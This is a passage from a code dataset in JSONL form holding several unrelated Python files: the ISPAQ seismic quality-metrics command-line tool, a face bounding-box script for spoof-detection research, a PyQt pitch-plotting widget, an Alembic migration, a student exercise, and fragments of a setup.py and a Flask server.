include_package_data=True,\n zip_safe=False,\n setup_requires=[\n 'setuptools',\n 'docutils>=0.3',\n # 'click>=6.0',\n 'twobitreader',\n 'pyBigWig',\n 'numpy',\n 'scipy',\n 'matplotlib',\n ],\n test_suite='tests',\n test_requires=[\n 'unittest',\n # 'click>=6.0',\n 'numpy',\n ]\n)\n","repo_name":"genome-dashboard/genome-dashboard-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35291329386","text":"import numpy as np\nimport cv2\nimport os\n\n\ndef getbboxesinfo(path, image_names, showResults=False):\n faceCascade = cv2.CascadeClassifier(\"./classifiers/haarcascade_frontalface_default.xml\")\n widths = []\n heights = []\n iterations = len(image_names)\n count = 0\n for img_name in image_names:\n image = cv2.imread(path + img_name)\n\n dim = tuple((np.array([image.shape[1], image.shape[0]]) / 4).astype(np.int))\n image = cv2.resize(image, dim)\n\n rects_face = faceCascade.detectMultiScale(image, scaleFactor=1.1, minNeighbors=5, minSize=(100, 100),\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n if img_name == \"USUARIO_058.JPG\":\n rects_face = rects_face[0:1]\n elif img_name == 
\"USUARIO_128.JPG\":\n rects_face = rects_face[1:2]\n elif img_name == \"spoof_058.JPG\":\n rects_face = rects_face[2:3]\n elif img_name == \"spoof_090.JPG\":\n rects_face = rects_face[0:1]\n\n for r in rects_face:\n widths.append(r[2])\n heights.append(r[3])\n cv2.rectangle(image, (r[0], r[1]), (r[0] + r[2], r[1] + r[3]), (0, 255, 0), 3)\n\n if showResults == True:\n cv2.imshow(img_name, image)\n cv2.waitKey()\n cv2.destroyWindow(img_name)\n count += 1\n print(str(round(count/iterations * 100)) + \"%\")\n\n nd_w = np.array(widths)\n nd_h = np.array(heights)\n\n w = [np.average(nd_w), np.max(nd_w), np.min(nd_w)]\n h = [np.average(nd_h), np.max(nd_h), np.min(nd_h)]\n\n return w, h\n\n\nuser_path = \"./data/COLOR/USER/\"\nattack_path = \"./data/COLOR/attack_01/\"\n\nuser_image_names = os.listdir(user_path)\nattack_image_names = os.listdir(attack_path)\n\nw_users, h_users = getbboxesinfo(user_path, user_image_names)\nw_attack, h_attack = getbboxesinfo(attack_path, attack_image_names)\n\nprint()\nprint(\"[avg, max, min]\")\nprint(\"Users info:\", w_users, h_users)\nprint(\"Attacks info:\", w_attack, h_attack)\n\n\n\n","repo_name":"alvarogharo/biometric-attack-detection","sub_path":"face-bbox-avg-size.py","file_name":"face-bbox-avg-size.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73625011626","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"ispaq.ispaq: provides entry point main().\"\"\"\n\n# Basic modules\nimport os\nimport sys\nimport imp\nimport argparse\nimport datetime\nimport logging\nimport numpy as np\nimport subprocess\nfrom _ast import Try\nfrom numpy.random import sample\n\n__version__ = \"3.1.2\"\n\n# dictionary of currently defined ISPAQ metric groups and business logic\n# for comparison with R package IRISMustangMetrics/ISPAQUtils.R json\n\ndef currentispaq():\n # The metrics that are inside of each of these (ex basicStats) is defined in ISPAQUtils.R and returned in the function getMetricFunctionMetadata\n groups = {'simple': ['basicStats','gaps','numSpikes','STALTA','stateOfHealth','maxRange'],\n 'SNR': ['SNR'],\n 'PSD': ['PSD','PSDText','PDF'],\n 'crossCorrelation': ['crossCorrelation'],\n 'crossTalk': ['crossTalk'],\n 'orientationCheck': ['orientationCheck'],\n 'pressureCorrelation': ['pressureCorrelation'],\n 'transferFunction': ['transferFunction'],\n 'sampleRate': ['sampleRateResp','sampleRateChannel'] }\n return groups\n\ndef main():\n \n # Check our Conda environment ----------------------------------------------\n # let's check for our primary supporting python modules\n try:\n imp.find_module('rpy2')\n imp.find_module('obspy')\n imp.find_module('pandas')\n except ImportError as e:\n print('ERROR: please activate your ispaq environment before running: %s' % e)\n raise SystemExit\n \n # Parse arguments ----------------------------------------------------------\n \n epilog_text='If no preference file is specified and the default file ./preference_files/default.txt cannot be found:\\n--csv_dir, pdf_dir, and psd_dir default to \".\"\\n--sncl_format defaults to \"N.S.C.L\"\\n--sigfigs defaults to \"6\"\\n--pdf_type defaults to \"plot,text\"\\n--pdf_interval defaults to \"aggregated\"\\n--plot_include defaults to \"colorbar,legend\"'\n parser = argparse.ArgumentParser(description=\" \".join([\"ISPAQ version\",__version__]), epilog=epilog_text,formatter_class=lambda prog: argparse.RawTextHelpFormatter(prog,max_help_position=35,width=82))\n parser._optionals.title = \"single 
arguments\"\n\n metrics = parser.add_argument_group('arguments for running metrics')\n metrics.add_argument('-P', '--preferences-file', required=False, help='path to preference file, default=./preference_files/default.txt')\n metrics.add_argument('-M', '--metrics', required=False,\n help='single Metrics alias as defined in preference file, or one or \\nmore metric names in a comma-separated list, required')\n metrics.add_argument('-S', '--stations', required=False,\n help='single Station_SNCLs alias as defined in preference file, or \\none or more SNCL[Q] in a comma-separated list, required.\\nnotes: SNCL[Q] refers to Station.Network.Channel.Location.(optional)Quality\\n If using wildcarding, enclose in quotation marks')\n metrics.add_argument('--starttime', required=False,\n help='starttime in ObsPy UTCDateTime format, required for webservice requests \\nand defaults to earliest data file for local data \\nexamples: YYYY-MM-DD, YYYYMMDD, YYYY-DDD, YYYYDDD[THH:MM:SS]')\n metrics.add_argument('--endtime', required=False,\n help='endtime in ObsPy UTCDateTime format, default=starttime + 1 day; \\nif starttime is also not specified then it defaults to the latest data \\nfile for local data \\nexamples: YYYY-MM-DD, YYYYMMDD, YYYY-DDD, YYYYDDD[THH:MM:SS]')\n \n \n prefs = parser.add_argument_group('optional arguments for overriding preference file entries')\n prefs.add_argument('--dataselect_url', required=False,\n help='FDSN webservice or path to directory with miniSEED files')\n prefs.add_argument('--station_url', required=False,\n help='FDSN webservice or path to stationXML file')\n prefs.add_argument('--event_url', required=False,\n help='FDSN webservice or path to QuakeML file')\n prefs.add_argument('--resp_dir', required=False,\n help='path to directory with RESP files')\n prefs.add_argument('--output', required=False,\n help='write metrics to csv file (csv) or sqlite database file (db). 
Options: csv, db')\n prefs.add_argument('--db_name', required=False,\n help='name of sqlite database file, if output=db')\n prefs.add_argument('--csv_dir', required=False,\n help='directory to write generated metrics .csv files, if output=csv')\n prefs.add_argument('--psd_dir', required=False,\n help='directory to write/read existing PSD .csv files, if output=csv')\n prefs.add_argument('--pdf_dir', required=False,\n help='directory to write generated PDF files')\n prefs.add_argument('--pdf_type', required=False,\n help='output format of generated PDFs - text and/or plot')\n prefs.add_argument('--pdf_interval', required=False,\n help='time span for PDFs - daily and/or aggregated over the entire span')\n prefs.add_argument('--plot_include', required=False,\n help='PDF plot graphics options - legend, colorbar, and/or fixed_yaxis_limits, \\nor none')\n prefs.add_argument('--sncl_format', required=False,\n help='format of SNCL aliases and miniSEED file names \\nexamples:\"N.S.L.C\",\"S.N.L.C\"\\nwhere N=network code, S=station code, L=location code, C=channel code')\n prefs.add_argument('--sigfigs', required=False, help='number of significant figures used for output columns named \"value\"')\n prefs.add_argument('--sds_files',action='store_true',default=False,help='if set, ISPAQ will look for local data files with Seiscomp SDS naming format \\nNET.STA.LOC.CHAN.TYPE.YEAR.DAY where TYPE=D')\n \n other = parser.add_argument_group('other arguments')\n other.add_argument('--log-level', action='store', default='INFO',\n choices=['DEBUG','INFO','WARNING','ERROR','CRITICAL'],\n help='log level printed to console, default=\"INFO\"')\n parser.add_argument('-A', '--append', action='store_true', default=False,\n help='append to TRANSCRIPT file rather than overwriting')\n parser.add_argument('-V', '--version', action='version',\n version='%(prog)s ' + __version__)\n parser.add_argument('-I', '--install-r',action='store_true', default=False,\n help='install CRAN IRIS Mustang packages, and exit')\n parser.add_argument('-U', '--update-r', action='store_true', default=False,\n help='check for and install newer CRAN IRIS Mustang packages \\nand/or update required conda packages, and exit')\n parser.add_argument('-L', '--list-metrics', action='store_true', default=False,\n help='list names of available metrics and exit')\n\n try:\n args = parser.parse_args(sys.argv[1:])\n except IOError as msg:\n print(str(msg))\n parser.error(str(msg)) # we may encounter an error accessing the indicated file\n raise SystemExit\n \n # Set up logging -----------------------------------------------------------\n \n # Full DEBUG level logging goes to ISPAQ_TRANSCRIPT.log\n # Console logging level is set by the '--log-level' argument\n \n logger = logging.getLogger(__name__)\n logger.setLevel(logging.DEBUG)\n \n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n \n if args.append:\n fh = logging.FileHandler('ISPAQ_TRANSCRIPT.log', mode='a')\n else:\n fh = logging.FileHandler('ISPAQ_TRANSCRIPT.log', mode='w')\n\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n \n ch = logging.StreamHandler()\n ch.setLevel(getattr(logging, args.log_level))\n ch.setFormatter(formatter) \n logger.addHandler(ch)\n\n logger.info('Running ISPAQ version %s on %s' % (__version__, datetime.datetime.now().strftime('%c')))\n\n # check that IRIS CRAN packages are installed\n\n import obspy\n from distutils.version import StrictVersion\n from . 
import updater \n import rpy2.robjects as ro\n from rpy2 import rinterface \n from rpy2.robjects import pandas2ri\n from rpy2.robjects.packages import importr\n from rpy2.robjects.conversion import localconverter\n\n IRIS_packages = ['seismicRoll','IRISSeismic','IRISMustangMetrics']\n\n r_installed = ro.r(\"installed.packages()\")\n\n with localconverter(ro.default_converter + pandas2ri.converter):\n installed_names = ro.conversion.rpy2py(r_installed.rownames).tolist()\n\n flag=0\n for package in IRIS_packages:\n if package not in installed_names:\n print(\"IRIS R package \" + package + \" is not installed\")\n flag=1\n if (flag == 1):\n print(\"\\nAttempting to install IRIS R packages from CRAN\")\n updater.install_IRIS_packages_missing(IRIS_packages,logger)\n\n\n # Validate the args --------------------------------------------------------\n \n # We can't use required=True in argpase because folks should be able to type only -U\n \n if not (args.update_r or args.install_r or args.list_metrics):\n # metric sets\n if args.metrics is None:\n logger.critical('argument -M/--metrics is required to run metrics')\n raise SystemExit\n \n # stations sets\n if args.stations is None:\n logger.critical('argument -S/--stations is required to run metrics')\n raise SystemExit\n \n \n # Handle R package upgrades ------------------------------------------------\n\n _R_install_packages = ro.r('utils::install.packages')\n\n if args.install_r:\n logger.info('(Re)installing IRIS R packages from CRAN')\n updater.install_IRIS_packages(IRIS_packages,logger)\n sys.exit(0)\n\n if args.update_r:\n logger.info('Checking for recommended conda packages...')\n x=ro.r(\"packageVersion('base')\")\n x_str = \".\".join(map(str,np.array(x.rx(1)).flatten()))\n if ((StrictVersion(obspy.__version__) < StrictVersion(\"1.4.0\")) \n or (StrictVersion(x_str) < StrictVersion(\"3.6.0\")) ):\n logger.debug('obspy>=1.4.0 or r>=3.6 not found')\n logger.info('Updating conda packages...')\n conda_str = (\"conda install -c conda-forge pandas=1.2.3 obspy=1.4.0 r=3.6 \" +\n \" r-rcurl=1.98_1.3 r-xml=3.99_0.3 r-dplyr=1.0.6 r-quadprog=1.5_8 r-signal=0.7_6\" +\n \" r-pracma=2.3.3 rpy2=3.1.0 r-stringr=1.4.0 numpy=1.21.4 r-rcpp=1.0.6\")\n subprocess.call(conda_str, shell=True)\n logger.info('(Re)installing IRIS R packages from CRAN')\n try:\n for package in IRIS_packages:\n _R_install_packages(package)\n logger.info('Installed %s' % (package))\n except Exception as e:\n logger.error('Unable to install %s: %s' % (package,e))\n else:\n logger.info('Required conda packages found')\n\n logger.info('Checking for IRIS R package updates...')\n df = updater.get_IRIS_package_versions(IRIS_packages,logger)\n print('\\n%s\\n' % df)\n updater.update_IRIS_packages(IRIS_packages,logger)\n sys.exit(0)\n\n if args.list_metrics:\n logger.info('Checking for available metrics in IRIS R packages...')\n from . 
import irismustangmetrics\n default_function_dict = irismustangmetrics.function_metadata()\n ispaq_dict = currentispaq()\n metricList = []\n for function_name in default_function_dict:\n default_function = default_function_dict[function_name]\n bLogic = default_function['businessLogic']\n for metric_name in default_function['metrics']:\n if metric_name not in ['pdf_plot','pdf_text']:\n if bLogic not in ispaq_dict: \n metricList.append(metric_name + \" *metric will not run with this version of ISPAQ*\")\n else:\n if function_name not in ispaq_dict[bLogic]:\n metricList.append(metric_name + \" *metric will not run with this version of ISPAQ*\")\n else:\n metricList.append(metric_name)\n for line in sorted(metricList):\n print(line)\n sys.exit(0)\n\n\n # Load additional modules --------------------------------------------------\n\n # These are loaded here so that asking for --version or --help is not bogged down\n # by the slow-to-load modules that require matplotlib\n\n # ISPAQ modules\n from .user_request import UserRequest\n from .concierge import Concierge, NoAvailableDataError\n from . import irisseismic\n from . import irismustangmetrics\n from . import utils\n \n # Specific ISPAQ business logic\n from .simple_metrics import simple_metrics\n from .SNR_metrics import SNR_metrics\n from .PSD_metrics import PSD_metrics\n from .crossTalk_metrics import crossTalk_metrics\n from .pressureCorrelation_metrics import pressureCorrelation_metrics\n from .crossCorrelation_metrics import crossCorrelation_metrics\n from .orientationCheck_metrics import orientationCheck_metrics\n from .transferFunction_metrics import transferFunction_metrics\n from .sampleRate_metrics import sampleRate_metrics\n\n if (StrictVersion(obspy.__version__) < StrictVersion(\"1.2.2\")):\n print(\"Please update ObsPy version \" + str(obspy.__version__) + \" to version 1.2.2\")\n message = \"Would you like to update obspy now? [y]/n: \"\n answer = input(message).lower()\n accepted_answer = ['','yes','y']\n rejected_answer = ['n','no']\n while ((answer not in accepted_answer) and (answer not in rejected_answer)):\n print(\"Invalid choice: \" + answer)\n message = \"Would you like to update obspy now? [y]/n: \"\n answer = input(message).lower()\n if answer in accepted_answer:\n subprocess.call(\"conda install -c conda-forge obspy=1.2.2\",shell=True)\n elif answer in rejected_answer:\n print(\"Exiting now without updating conda packages.\")\n raise SystemExit\n\n\n # Create UserRequest object ------------------------------------------------\n #\n # The UserRequest class is in charge of parsing arguments issued on the\n # command line, loading and parsing a preferences file, and setting a bunch\n # of properties that capture the totality of what the user wants in a single\n # invocation of the ISPAQ top level script.\n\n logger.debug('Creating UserRequest ...')\n try:\n user_request = UserRequest(args, logger=logger)\n except Exception as e:\n logger.debug(e)\n logger.critical(\"Failed to create UserRequest object\")\n raise SystemExit\n\n # Create Concierge (aka Expediter) -----------------------------------------\n #\n # The Concierge class uses the completely filled out UserRequest and has the\n # job of expediting requests for information that may be made by any of the\n # business_logic methods. 
The goal is to have business_logic methods that can\n # be written as clearly as possible without having to know about the intricacies\n # of ObsPy.\n \n logger.debug('Creating Concierge ...')\n try:\n concierge = Concierge(user_request=user_request, logger=logger)\n except Exception as e:\n logger.debug(e)\n logger.critical(\"Failed to create Concierge object\")\n raise SystemExit\n\n # Generate Simple Metrics --------------------------------------------------\n\n if 'simple' in concierge.logic_types:\n logger.debug('Inside simple business logic ...')\n try:\n df = simple_metrics(concierge)\n if df is None:\n logger.info('No simple metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_simpleMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing simple metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing simple metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'simple' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'simple' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'simple' metrics\")\n\n \n if 'sampleRate' in concierge.logic_types:\n logger.debug('Inside sampleRate business logic ...')\n try:\n df = sampleRate_metrics(concierge)\n if df is None:\n logger.info('No sampleRate metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_sampleRateMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing sampleRate metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing sampleRate metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'sampleRate' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'sampleRate' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'sampleRate' metrics\")\n\n # Generate SNR Metrics -----------------------------------------------------\n\n if 'SNR' in concierge.logic_types:\n logger.debug('Inside SNR business logic ...')\n try:\n df = SNR_metrics(concierge)\n if df is None:\n logger.info('No SNR metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_SNRMetrics.csv\"\n \n if concierge.output == 'csv':\n logger.info('Writing SNR metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing SNR metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'SNR' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'SNR' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'SNR' metrics\")\n\n\n # Generate PSD Metrics -----------------------------------------------------\n\n if 'PSD' in concierge.logic_types:\n logger.debug('Inside PSD business logic ...')\n try:\n df = PSD_metrics(concierge)\n if 'PSD' not in concierge.function_by_logic['PSD']:\n pass\n elif df is None:\n logger.info('No PSD metrics were calculated')\n else:\n try:\n # Write out the metrics\n filepath = concierge.output_file_base + \"_PSDMetrics.csv\"\n if concierge.output == 'csv':\n 
logger.info('Writing PSD metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing PSD metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'PSD' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'PSD' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'PSD' metrics\")\n\n\n # Generate Cross Talk Metrics ----------------------------------------------\n\n if 'crossTalk' in concierge.logic_types:\n logger.debug('Inside crossTalk business logic ...')\n try:\n df = crossTalk_metrics(concierge)\n if df is None:\n logger.info('No crossTalk metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_crossTalkMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing crossTalk metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing crossTalk metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'crossTalk' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'crossTalk' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'crossTalk' metrics\")\n \n\n # Generate Pressure Correlation Metrics ----------------------------------------------\n\n if 'pressureCorrelation' in concierge.logic_types:\n logger.debug('Inside pressureCorrelation business logic ...')\n try:\n df = pressureCorrelation_metrics(concierge)\n if df is None:\n logger.info('No pressureCorrelation metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_pressureCorrelationMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing pressureCorrelation metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing pressureCorrelation metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'pressureCorrelation' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'pressureCorrelation' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'pressureCorrelation' metrics\")\n \n\n # Generate Cross Correlation Metrics ---------------------------------------\n\n if 'crossCorrelation' in concierge.logic_types:\n logger.debug('Inside crossCorrelation business logic ...')\n try:\n df = crossCorrelation_metrics(concierge)\n if df is None:\n logger.info('No crossCorrelation metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_crossCorrelationMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing crossCorrelation metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing crossCorrelation metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'crossCorrelation' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'crossCorrelation' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'crossCorrelation' metrics\")\n \n\n # 
Generate Orientation Check Metrics ---------------------------------------\n\n    if 'orientationCheck' in concierge.logic_types:\n        logger.debug('Inside orientationCheck business logic ...')\n        try:\n            df = orientationCheck_metrics(concierge)\n            if df is None:\n                logger.info('No orientationCheck metrics were calculated')\n            else:\n                try:\n                    filepath = concierge.output_file_base + \"_orientationCheckMetrics.csv\"\n                    if concierge.output == 'csv':\n                        logger.info('Writing orientationCheck metrics to %s' % filepath)\n                    elif concierge.output == 'db':\n                        logger.info('Writing orientationCheck metrics to %s' % concierge.db_name)\n                    utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n                except Exception as e:\n                    logger.debug(e)\n                    logger.error(\"Error writing 'orientationCheck' metric results\")\n        except NoAvailableDataError as e:\n            logger.info(\"No data available for 'orientationCheck' metrics\")\n        except Exception as e:\n            logger.debug(e)\n            logger.error(\"Error calculating 'orientationCheck' metrics\")\n        \n    \n    # Generate Transfer Function Metrics ---------------------------------------\n\n    if 'transferFunction' in concierge.logic_types:\n        logger.debug('Inside transferFunction business logic ...')\n        try:\n            df = transferFunction_metrics(concierge)\n            if df is None:\n                logger.info('No transferFunction metrics were calculated')\n            else:\n                try:\n                    filepath = concierge.output_file_base + \"_transferMetrics.csv\"\n                    if concierge.output == 'csv':\n                        logger.info('Writing transfer metrics to %s' % filepath)\n                    elif concierge.output == 'db':\n                        logger.info('Writing transferFunction metrics to %s' % concierge.db_name)\n                    utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n                except Exception as e:\n                    logger.debug(e)\n                    logger.error(\"Error writing 'transferFunction' metric results\")\n        except NoAvailableDataError as e:\n            logger.info(\"No data available for 'transferFunction' metrics\")\n        except Exception as e:\n            logger.debug(e)\n            logger.error(\"Error calculating 'transferFunction' metrics\")\n\n\n    logger.info('ALL FINISHED!')\n\n\n# ------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"iris-edu/ispaq","sub_path":"ispaq/ispaq.py","file_name":"ispaq.py","file_ext":"py","file_size_in_byte":27264,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"31353911403","text":"# coding: utf-8\n# PROG1 - UFCG\n# STUDENT: EMANUEL VINICIUS | DATE: 16/12/2021 \n# STUDENT ID: 120210785\n# EXERCISE: PROGRAM THAT DETECTS A NOISE DISTURBANCE\n\n#|INPUTS|\nruido = input()\nhora = int(input())\n\n#|PROCESSING|\n\nif ruido != \"\" and hora > 22:\n    mensagem = \"Perturbação Detectada!\"\nelse:\n    mensagem = \"Condomínio em Paz.\"\n\nprint(mensagem)\n","repo_name":"EmanuelSal/Atividades_Programacao-1","sub_path":"questões_tst/sensor_ruidos/ruidos.py","file_name":"ruidos.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40072263192","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Widgets\nfrom PyQt5.QtWidgets import QWidget\n# Layouts\nfrom PyQt5.QtWidgets import QVBoxLayout\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom converter.gui_converter_common_widgets import MyNavigationToolbar2QT\n\nimport wave\nimport numpy as np\nfrom gui_common_widgets import MultiprocessingQTimer\n\n\ndef 
GetSignalTempToPlot(filename,SubSamplingRate=8000.0):\n    with wave.open(filename,mode='rb') as wavefile:\n        Fe = wavefile.getframerate()\n        Te = 1.0/Fe\n        NbSamples = wavefile.getnframes()\n        nb_channels = wavefile.getnchannels()\n        \n        sampwidth = wavefile.getsampwidth()\n        temp = wavefile.readframes(NbSamples)\n        \n        if sampwidth == 1:\n            temp = np.frombuffer(temp,dtype=np.int8)\n        elif sampwidth == 2:\n            temp = np.frombuffer(temp,dtype=np.int16)\n        elif sampwidth == 4:\n            temp = np.frombuffer(temp,dtype=np.int32)\n        elif sampwidth == 8:\n            temp = np.frombuffer(temp,dtype=np.int64)\n        else:\n            print(\"The sampled width is not compatible: number of Bytes= %d\"%sampwidth)\n            raise ValueError(\"The sample width of the wav file is not compatible with the application\")\n        \n        if(Fe>SubSamplingRate):\n            BestError = np.inf\n            BestInd = 1\n            for div in range(2,10):\n                error = np.abs(SubSamplingRate - 1.0/(Te*div))\n                if(error < BestError):\n                    BestError = error\n                    BestInd = div\n            \n            NbSampFinal = int(NbSamples/(nb_channels*BestInd))\n            xData = np.arange(0,NbSampFinal)*(Te*BestInd)\n            yData = np.zeros(NbSampFinal,dtype=temp.dtype)\n            for k in range(0,NbSampFinal):\n                samps = temp[k*BestInd*nb_channels:(k*BestInd+1)*nb_channels].astype(float)\n                yData[k] = np.round(np.mean(samps)).astype(temp.dtype)\n        else:\n            NbSampFinal = int(NbSamples/nb_channels)\n            xData = np.arange(0,NbSampFinal)*Te\n            yData = np.zeros(NbSampFinal,dtype=temp.dtype)\n            for k in range(0,NbSampFinal):\n                samps = temp[k*nb_channels:(k+1)*nb_channels].astype(float)\n                yData[k] = np.round(np.mean(samps)).astype(temp.dtype)\n    return({'x':xData,'y':yData})\n    \n\nclass PlotStep1Widget(QWidget):\n    def __init__(self, parent):\n        QWidget.__init__(self, parent)\n        # Attributes\n        self.parent = parent\n        self.ParametersManager = parent.ParametersManager\n        self.figure = Figure()\n        self.canvas = FigureCanvas(self.figure)\n        self.toolbar = MyNavigationToolbar2QT(self.canvas, self)\n        # set the layout\n        mainLayout = QVBoxLayout()\n        mainLayout.addWidget(self.toolbar)\n        mainLayout.addWidget(self.canvas)\n        self.setLayout(mainLayout)\n        # Initialization\n        self.resetView()\n        self.ProcessForPlotting = MultiprocessingQTimer(500)\n        self.ProcessForPlotting.finished.connect(self.plotSignalTemp)\n    \n    def resetView(self):\n        self.figure.clf()\n        self.ax1 = self.figure.add_subplot(211)\n        self.ax1.set_ylabel(\"Amplitude\")\n        self.lineStart = self.ax1.axvline(0,linestyle='--',color='r')\n        self.lineEnd = self.ax1.axvline(0,linestyle='--',color='r')\n        self.lineStart.set_visible(False)\n        self.lineEnd.set_visible(False)\n        self.ax2 = self.figure.add_subplot(212,sharex=self.ax1)\n        self.ax2.set_ylabel(\"Pitch\")\n        self.ax2.set_xlabel(\"Time [s]\")\n        self.ax1.grid()\n        self.ax2.grid()\n        self.resultPlot = self.ax2.plot([],[])[0]\n        self.figure.set_tight_layout(True)\n    \n    def UpdateVlineStart(self,x_lineStart):\n        if(x_lineStart is not None):\n            self.lineStart.set_xdata(x_lineStart)\n            self.lineStart.set_visible(True)\n            self.canvas.draw_idle()\n        else:\n            self.lineStart.set_visible(False)\n    \n    def UpdateVlineEnd(self,x_lineEnd):\n        if(x_lineEnd is not None):\n            self.lineEnd.set_xdata(x_lineEnd)\n            self.lineEnd.set_visible(True)\n            self.canvas.draw_idle()\n        else:\n            self.lineEnd.set_visible(False)\n    \n    def plotSignalTemp(self):\n        x = self.ProcessForPlotting.results['x']\n        y = self.ProcessForPlotting.results['y']\n        self.ax1.plot(x,y)\n        self.canvas.draw_idle()\n    \n    def plotResults(self,OutputStep1):\n        x = np.arange(len(OutputStep1['pitch_st']))*OutputStep1['te_s']\n        y = OutputStep1['pitch_st']\n        
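        # Update the existing pitch line in place; the relim/autoscale calls
        # that follow rescale the axes without re-creating the artist.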
self.resultPlot.set_data(x,y)\n self.ax2.relim()\n self.ax2.autoscale_view()\n self.canvas.draw_idle()\n \n def InitView(self,filename):\n self.ProcessForPlotting.start(GetSignalTempToPlot,(filename,))\n \n","repo_name":"Niicoo/scorelisto-python-gui","sub_path":"converter/step1/gui_plot_step1_widget.py","file_name":"gui_plot_step1_widget.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71099298292","text":"\"\"\"bundle is_complete\n\nRevision ID: ff7b2a6133b3\nRevises: 9e4328c625f8\nCreate Date: 2022-08-05 09:38:57.514862\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'ff7b2a6133b3'\ndown_revision = '9e4328c625f8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('invoice_bundle', sa.Column('is_complete', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('invoice_bundle', 'is_complete')\n # ### end Alembic commands ###\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"migrations/versions/ff7b2a6133b3_bundle_is_complete.py","file_name":"ff7b2a6133b3_bundle_is_complete.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4438209787","text":"import json\nimport os\nfrom io import BytesIO\nfrom typing import Dict, Type\n\nimport math\nfrom flask import Flask, send_file, request, abort, Response, jsonify\nfrom flask_caching import Cache\nimport logging\n\nfrom flask_cors import CORS, cross_origin\n\nfrom source.complex_log_projection import ComplexLogProjection\nfrom source.lat_lng 